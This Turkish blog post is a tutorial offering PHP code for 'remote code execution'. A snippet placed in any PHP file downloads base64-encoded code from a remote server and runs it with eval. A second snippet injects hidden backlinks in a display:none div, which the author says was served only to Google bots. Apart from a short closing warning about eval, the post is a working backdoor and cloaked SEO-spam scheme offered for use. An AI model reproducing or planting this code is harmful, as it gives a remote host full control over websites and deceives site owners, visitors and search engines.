Php Uzaktan Kod Çalıştırma
Bundan yıllar önce backlink için bir sistem için düşünmüştüm ama daha farklı şeyler içinde kullandığım bir sistem oldu. Dışarıda hazır aldığınız ücretsiz sürümlerde bu tarz şeyler olabilir dikkatli olmanızı tavsiye ederim.
function eval(String){}
Sizle beraber hazırlayacağımız şey eskisi gibi backlink olsun. Bu herkesin sevebileceği ve isteyebileceği şey. Uzak sunucuda bir txt veya çıktı veren bir şey bize ne yapmamız gerektiğini söyleyin bir kod parçaları. Not: her hosting veya sunucular farklı özellikler aktif olabilir. Bu kodların temiz bir şekilde yazılmış olması gereklidir. Örneğin : curl kapalı. function_exits(‘curl_version’) gibi kontrol edip öyle çalıştırmasını isteyebiliriz.
www.uzaksunucumuz.com/kodlarimiz.txt ( PHP TAG YOK ) ( base64_encode)
eğer base64 encode kullanmıyorsanız. default.php base64_decode kaldırın.
$URL = "http://www.domain.com/links.txt";
if(function_exists('curl_version')){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$URL);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
}else{
$response = file_get_contents($URL);
}
if (!empty($response)) {
echo $response;
}default.php ( herhangi bir php dosyası)
$URL = "http://www.domain.com/kodlarimiz.txt";
if(function_exists('curl_version')){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$URL);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
}else{
$response = file_get_contents($URL);
}
if (!empty($response)) {
eval(base64_decode($response));
}links.txt ( domain.com/links.txt )
<div style='display:none'><a href="#">LİNK</a> | <a href="#">LİNK</a></div>Gördüğünüz gibi başka şeylerde yapabilirsiniz. Asıl hedef nokta default.php yani her hangi bir yerde çalışacak olan PHP kodlarimiz.txt çalıştıracaktır. CACHE sistemi yapmanız ve sürekli istek yapmaması gerekmektedir. Yoksa baya bir istek de bulunacaktır. Hem sizin hemde hosting için kötü olur. Ben sadece google botları gelince çalıştırıyordum :)
EVAL kodu tehlikesi
Eval kodu sizin için tehlikeli olabilir. Örneğin GET veya POST dışarıdan aldığınız bir bilgiyi filtre yapmadan eval ile çalıştırsanız. PHP yapabileceği her şeyi yapabilir saldırgan.
